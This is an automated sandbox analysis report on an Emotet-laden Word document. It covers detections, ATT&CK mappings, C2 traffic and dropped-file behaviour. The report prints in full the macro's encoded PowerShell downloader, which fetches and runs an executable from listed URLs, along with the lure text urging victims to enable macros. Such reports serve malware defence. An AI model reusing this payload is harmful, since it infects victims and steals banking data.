Loading ...

Play interactive tourEdit tour

Analysis Report VJW-020120 SKT-020720.doc

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:206805
Start date:07.02.2020
Start time:17:15:28
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 3s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:VJW-020120 SKT-020720.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winDOC@5/14@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 7.1% (good quality ratio 6.9%)
  • Quality average: 77.5%
  • Quality standard deviation: 23.9%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 30
  • Number of non-executed functions: 231
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Hidden Files and Directories1Process Injection2Disabling Security Tools1Input Capture1System Time Discovery2Remote File Copy2Input Capture1Data Encrypted1Commonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaPowerShell4Port MonitorsAccessibility FeaturesSoftware Packing1Network SniffingSecurity Software Discovery12Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting2Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information11Input CaptureFile and Directory Discovery3Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API2System FirmwareDLL Search Order HijackingScripting2Credentials in FilesSystem Information Discovery37Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution3Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information21Account ManipulationVirtualization/Sandbox Evasion2Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceMasquerading231Brute ForceProcess Discovery3Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface111Path InterceptionScheduled TaskHidden Files and Directories1Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionVirtualization/Sandbox Evasion2Bash HistoryRemote System Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess Injection2Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\657.exeAvira: detection malicious, Label: TR/AD.Emotet.aouip
Antivirus detection for sampleShow sources
Source: VJW-020120 SKT-020720.docAvira: detection malicious, Label: W2000M/Agent.12622
Found malware configurationShow sources
Source: eventcreate.exe.2020.4.memstrMalware Configuration Extractor: Emotet {"C2 list": ["71.126.247.90/em0StrbgyF1rMGA"]}
Multi AV Scanner detection for domain / URLShow sources
Source: supcargo.comVirustotal: Detection: 9%Perma Link
Source: http://supcargo.com/Login/K/Virustotal: Detection: 18%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\657.exeVirustotal: Detection: 31%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: VJW-020120 SKT-020720.docVirustotal: Detection: 55%Perma Link
Machine Learning detection for sampleShow sources
Source: VJW-020120 SKT-020720.docJoe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_00592180 CryptDecodeObjectEx,4_2_00592180

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\657.exeCode function: 3_2_00428AA3 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlen,3_2_00428AA3
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: supcargo.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 64.71.35.51:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 64.71.35.51:80

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /Login/K/ HTTP/1.1Host: supcargo.comConnection: Keep-Alive
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: AFFINITY-FTL-AffinityInternetIncUS AFFINITY-FTL-AffinityInternetIncUS
Source: Joe Sandbox ViewASN Name: UUNET-MCICommunicationsServicesIncdbaVerizonBusi UUNET-MCICommunicationsServicesIncdbaVerizonBusi
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /em0StrbgyF1rMGAyHE/irxhN9ps3YEgB9agV/xAhxY/END0L/FVgPFqYg/ HTTP/1.1Referer: http://71.126.247.90/em0StrbgyF1rMGAyHE/irxhN9ps3YEgB9agV/xAhxY/END0L/FVgPFqYg/Content-Type: multipart/form-data; boundary=---------------------------909209975625263User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 71.126.247.90Content-Length: 4468Connection: Keep-AliveCache-Control: no-cache
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Source: unknownTCP traffic detected without corresponding DNS query: 71.126.247.90
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /Login/K/ HTTP/1.1Host: supcargo.comConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: supcargo.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /em0StrbgyF1rMGAyHE/irxhN9ps3YEgB9agV/xAhxY/END0L/FVgPFqYg/ HTTP/1.1Referer: http://71.126.247.90/em0StrbgyF1rMGAyHE/irxhN9ps3YEgB9agV/xAhxY/END0L/FVgPFqYg/Content-Type: multipart/form-data; boundary=---------------------------909209975625263User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 71.126.247.90Content-Length: 4468Connection: Keep-AliveCache-Control: no-cache
Urls found in memory or binary dataShow sources
Source: eventcreate.exe, 00000004.00000002.1370070205.0012B000.00000004.00000001.sdmp, eventcreate.exe, 00000004.00000002.1370590891.0072F000.00000004.00000001.sdmpString found in binary or memory: http://71.126.247.90/em0StrbgyF1rMGAyHE/irxhN9ps3YEgB9agV/xAhxY/END0L/FVgPFqYg/
Source: eventcreate.exe, 00000004.00000002.1370590891.0072F000.00000004.00000001.sdmpString found in binary or memory: http://71.126.247.90/em0StrbgyF1rMGAyHE/irxhN9ps3YEgB9agV/xAhxY/END0L/FVgPFqYg/66a2
Source: eventcreate.exe, 00000004.00000002.1370590891.0072F000.00000004.00000001.sdmpString found in binary or memory: http://71.126.247.90/em0StrbgyF1rMGAyHE/irxhN9ps3YEgB9agV/xAhxY/END0L/FVgPFqYg/rxh

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\657.exeCode function: 3_2_0041C023 GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_0041C023
Source: C:\Users\user\657.exeCode function: 3_2_00416206 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_00416206
Source: C:\Users\user\657.exeCode function: 3_2_0043A602 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,3_2_0043A602
Source: C:\Users\user\657.exeCode function: 3_2_00438A32 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_00438A32
Source: C:\Users\user\657.exeCode function: 3_2_0042D5F7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,3_2_0042D5F7
Source: C:\Users\user\657.exeCode function: 3_2_00437723 GetKeyState,GetKeyState,GetKeyState,3_2_00437723

E-Banking Fraud:

barindex
Malicious encrypted Powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e JABaAHUAZQBlAG8AegBnAHMAaQA9ACcAQQBiAG8AagBmAHgAegBsACcAOwAkAFMAdQB5AHgAZwBzAGQAZwBrACAAPQAgACcANgA1ADcAJwA7ACQAQQBsAGgAaQBiAGMAcABoAGgAZQBxAHYAZAA9ACcAWQB4AGwAcwByAHoAZgByAHQAeABpAHgAbgAnADsAJABDAGcAYwBjAGwAbAB5AGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAdQB5AHgAZwBzAGQAZwBrACsAJwAuAGUAeABlACcAOwAkAFkAagB3AGEAdAB0AHcAZgB5AD0AJwBBAHQAeABqAGYAawB3AGgAJwA7ACQAUQB4AGcAYgBqAGcAdgB5AHAAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAQwBsAGkAZQBOAHQAOwAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzAD0AJwBoAHQAdABwADoALwAvAHMAdQBwAGMAYQByAGcAbwAuAGMAbwBtAC8ATABvAGcAaQBuAC8ASwAvACoAaAB0AHQAcAA6AC8ALwBzAHUAbgB1AGMAdQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAFYAMABlAC8AKgBoAHQAdABwADoALwAvAHMAdwBlAGUAdABlAHMAdABzAGgAbwBwAC4AYwBhAC8AdwBwAC8AMwBjAGEANQBvAHEALwAqAGgAdAB0AHAAOgAvAC8AcwB1AGIAaABlAGQAYQByAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwAyAC8ANwBnAHQAVABFAE0AOAAvACoAaAB0AHQAcAA6AC8ALwB0AGEAawBoAGEAcgBhAG4AZABzAGgAYQBuAGsAZQByAHQAbwB1AHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEkAWABSAC8AMgAvACcALgAiAHMAYABQAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWgB5AHIAeQB2AHUAbwBsAD0AJwBDAGMAYgBmAGcAeQBkAHMAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBjAGgAeQBqAGkAbABuAG8AIABpAG4AIAAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzACkAewB0AHIAeQB7ACQAUQB4AGcAYgBqAGcAdgB5AHAALgAiAGQATwBXAG4AbABPAEEAYABkAGAARgBJAEwAZQAiACgAJABFAGMAaAB5AGoAaQBsAG4AbwAsACAAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQATgBvAG8AegBsAHQAagByAHkAYQBnAGcAPQAnAEwAZgBiAHgAeQBpAHQAZgB5AHoAeQBzAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABDAGcAYwBjAGwAbAB5AGoAKQAuACIATABFAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMgA0ADcAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIARQBhAFQAZQAiACgAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQARQBjAHcAawBtAGoAYwB6AGsAPQAnAFQAdQBlAHcAdgB4AGYAdgAnADsAYgByAGUAYQBrADsAJABWAGcAdQB4AGgAcQBvAGIAPQAnAEcAbABxAHcAZABrAHMAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAG4AeABkAGEAbAB0AGQAPQAnAE0AaABuAGYAagB3AGIAbQBlAHQAbgB4ACcA
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000004.00000002.1370429666.00591000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.964295216.002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.1370410119.00580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.964278358.002D0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Screenshot number: 4Screenshot OCR: Enable content button. I t3 I a O 13,2 '00%Q A GE)
Source: Screenshot number: 8Screenshot OCR: Enable editing button from the yellow bar above. Once you have enabled editing. Nease click Enable
Source: Screenshot number: 8Screenshot OCR: Enable content buttOn. O Pa,e, I of I I Words:O I t3 I @13 75% G) A GE) a
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 0Screenshot OCR: Enable content button.
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above, Once you have enabled editing, please click Enable
Source: Document image extraction number: 1Screenshot OCR: Enable content button.
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\657.exeJump to dropped file
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 2006
Creates files inside the system directoryShow sources
Source: C:\Users\user\657.exeFile created: C:\Windows\system32\eventcreate\Jump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\657.exeCode function: 3_2_004180EC3_2_004180EC
Source: C:\Users\user\657.exeCode function: 3_2_0044A1203_2_0044A120
Source: C:\Users\user\657.exeCode function: 3_2_0045E3C33_2_0045E3C3
Source: C:\Users\user\657.exeCode function: 3_2_0043C4F03_2_0043C4F0
Source: C:\Users\user\657.exeCode function: 3_2_0045E6373_2_0045E637
Source: C:\Users\user\657.exeCode function: 3_2_004506A93_2_004506A9
Source: C:\Users\user\657.exeCode function: 3_2_004567B23_2_004567B2
Source: C:\Users\user\657.exeCode function: 3_2_004507BF3_2_004507BF
Source: C:\Users\user\657.exeCode function: 3_2_0045E9413_2_0045E941
Source: C:\Users\user\657.exeCode function: 3_2_004629123_2_00462912
Source: C:\Users\user\657.exeCode function: 3_2_0044AC923_2_0044AC92
Source: C:\Users\user\657.exeCode function: 3_2_0043EEA93_2_0043EEA9
Source: C:\Users\user\657.exeCode function: 3_2_0045B0293_2_0045B029
Source: C:\Users\user\657.exeCode function: 3_2_0045F0CB3_2_0045F0CB
Source: C:\Users\user\657.exeCode function: 3_2_004030803_2_00403080
Source: C:\Users\user\657.exeCode function: 3_2_004531CC3_2_004531CC
Source: C:\Users\user\657.exeCode function: 3_2_0045D2F93_2_0045D2F9
Source: C:\Users\user\657.exeCode function: 3_2_0043F37C3_2_0043F37C
Source: C:\Users\user\657.exeCode function: 3_2_0043F7503_2_0043F750
Source: C:\Users\user\657.exeCode function: 3_2_004578753_2_00457875
Source: C:\Users\user\657.exeCode function: 3_2_0045D8223_2_0045D822
Source: C:\Users\user\657.exeCode function: 3_2_00457A623_2_00457A62
Source: C:\Users\user\657.exeCode function: 3_2_0043FB5C3_2_0043FB5C
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_0058531F4_2_0058531F
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_005959E04_2_005959E0
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: VJW-020120 SKT-020720.docOLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentationOLE, VBA macro: Module Bazoaquyjhej, Function Document_openName: Document_open
Document contains embedded VBA macrosShow sources
Source: VJW-020120 SKT-020720.docOLE indicator, VBA macros: true
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\657.exeCode function: String function: 0043D624 appears 87 times
Source: C:\Users\user\657.exeCode function: String function: 0044556E appears 38 times
Source: C:\Users\user\657.exeCode function: String function: 0041EC48 appears 54 times
Source: C:\Users\user\657.exeCode function: String function: 0043CA63 appears 190 times
PE file contains strange resourcesShow sources
Source: 657.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 657.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 657.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winDOC@5/14@1/2
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\System32\eventcreate\eventcreate.exeCode function: 4_2_005942A0 CreateToolhelp32Snapshot,Process32NextW,CloseHandle,4_2_005942A0
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\657.exeCode function: 3_2_004240A6 __EH_prolog3_catch_GS,VariantClear,SysAllocStringByteLen,CoCreateInstance,CoCreateInstance,CoCreateInstance,3_2_004240A6
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\657.exeCode function: 3_2_0040C4C0 FindResourceA,LoadResource,FreeResource,3_2_0040C4C0
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$W-020120 SKT-020720.docJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\eventcreate\eventcreate.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I5FDB4C6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\657.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M5FDB4C6A
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE93E.tmpJump to behavior
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: VJW-020120 SKT-020720.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: VJW-020120 SKT-020720.docOLE document summary: edited time not present or 0
Found command line outputShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3._\............3._....@83.L|._......gl '._..gl....L|._4............7._......._@83..R<.....D....... '._..._....Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........T...L..................uT..................u..0..................~..........................4.......>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L......._._.G.E.N.U.S. . . . . . . . . . .:. .2..............~..............................(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L..................u...................u..0..................~..................................>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...#..._._.C.L.A.S.S. . . . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........#...........>...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...#..............u...................u..0.....................................#...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...'..._._.S.U.P.E.R.C.L.A.S.S. . . . . .:. ..............."...................'...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...'..............u...................u..0.................+...................'...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...+..._._.D.Y.N.A.S.T.Y. . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...........+...........>...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...+..............u...................u..0.................C...................+...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L.../..._._.R.E.L.P.A.T.H. . . . . . . . .:. ...............Q.................../...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L.../..............u...................u..0.................Z.................../...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...3..._._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. .:. .2.............i...................3...........(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...3..............u...................u..0.................r...................3...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...7..._._.D.E.R.I.V.A.T.I.O.N. . . . . .:. .{.}...............................7...........*...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...7..............u...................u..0.....................................7...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...;..._._.S.E.R.V.E.R. . . . . . . . . .:. ...................................;...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...;..............u...................u..0.....................................;...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...?..._._.N.A.M.E.S.P.A.C.E. . . . . . .:. ...................................?...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...?..............u...................u..0.....................................?...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...C..._._.P.A.T.H. . . . . . . . . . . .:. ...................................C...........&...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...C..............u...................u..0.....................................C...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...G...P.r.o.c.e.s.s.I.d. . . . . . . . .:. .1.5.4.0...........................G...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...G..............u...................u..0.....................................G...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...K...R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.................................K...........(...>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...K..............u...................u..0.....................................K...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........H...L...O..............uH..................u..0.....................................O.......(.......>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...S.......`......u...................u..0.....................................S...............>..u........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............L...W.......`......u...................u..0.................(...................W...............>..u........Jump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\657.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\eventcreate\eventcreate.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: VJW-020120 SKT-020720.docVirustotal: Detection: 55%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
